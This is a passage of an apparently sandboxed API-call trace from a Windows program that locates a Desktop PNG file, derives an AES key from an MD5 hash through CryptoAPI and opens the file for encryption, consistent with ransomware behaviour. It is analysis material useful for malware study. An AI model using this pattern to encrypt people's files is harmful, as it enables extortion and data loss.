Size=0xc) returned 0x9b9b50 [0168.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9b50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0168.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0168.013] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0168.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0168.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0168.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0168.014] CloseHandle (hObject=0x120) returned 1 [0168.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0168.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0168.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0168.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0168.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0168.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0168.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0168.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0168.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0168.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0168.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0168.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0168.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0168.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0168.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0168.016] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0168.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0168.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0168.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0168.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0168.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0168.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0168.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0168.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0168.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0168.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0168.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0168.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0168.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.017] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0168.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0168.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0168.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0168.018] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0168.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0168.018] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0168.018] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0168.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.018] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0168.018] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0168.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.018] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.018] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.018] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.018] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf332a6c0, ftCreationTime.dwHighDateTime=0x1d5df48, ftLastAccessTime.dwLowDateTime=0xc3dcaee0, ftLastAccessTime.dwHighDateTime=0x1d5e6d5, ftLastWriteTime.dwLowDateTime=0xc3dcaee0, ftLastWriteTime.dwHighDateTime=0x1d5e6d5, nFileSizeHigh=0x0, nFileSizeLow=0x41a7, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="VLNsdshtM2X.png", cAlternateFileName="VLNSDS~1.PNG")) returned 0x90add8 [0168.023] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.023] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.023] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf332a6c0, ftCreationTime.dwHighDateTime=0x1d5df48, ftLastAccessTime.dwLowDateTime=0xc3dcaee0, ftLastAccessTime.dwHighDateTime=0x1d5e6d5, ftLastWriteTime.dwLowDateTime=0xc3dcaee0, ftLastWriteTime.dwHighDateTime=0x1d5e6d5, nFileSizeHigh=0x0, nFileSizeLow=0x41a7, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="VLNsdshtM2X.png", cAlternateFileName="VLNSDS~1.PNG")) returned 0x90add8 [0168.024] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.024] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VLNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NsdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sdshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dshtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="shtM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="htM2X.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.026] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.026] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0168.026] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0168.026] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.026] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.026] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.026] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.026] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.027] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.027] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf332a6c0, ftCreationTime.dwHighDateTime=0x1d5df48, ftLastAccessTime.dwLowDateTime=0xc3dcaee0, ftLastAccessTime.dwHighDateTime=0x1d5e6d5, ftLastWriteTime.dwLowDateTime=0xc3dcaee0, ftLastWriteTime.dwHighDateTime=0x1d5e6d5, nFileSizeHigh=0x0, nFileSizeLow=0x41a7, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="VLNsdshtM2X.png", cAlternateFileName="VLNSDS~1.PNG")) returned 0x90af58 [0168.027] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0168.027] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.027] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0168.027] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.027] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.027] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0168.027] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.027] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0168.027] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.027] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.028] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0168.028] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.028] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.028] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0168.030] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0168.030] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0168.031] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0168.031] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0168.031] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.031] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0168.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.036] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0168.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.037] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0168.037] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0168.037] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.037] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.037] CryptHashData (hHash=0x90ae18, pbData=0x8dedf8, dwDataLen=0x19, dwFlags=0x1) returned 1 [0168.037] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.037] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0168.037] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.037] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0168.037] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.037] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.037] CryptDestroyHash (hHash=0x90ae18) returned 1 [0168.039] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vlnsdshtm2x.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0168.039] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.039] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0168.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0168.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0168.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0168.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 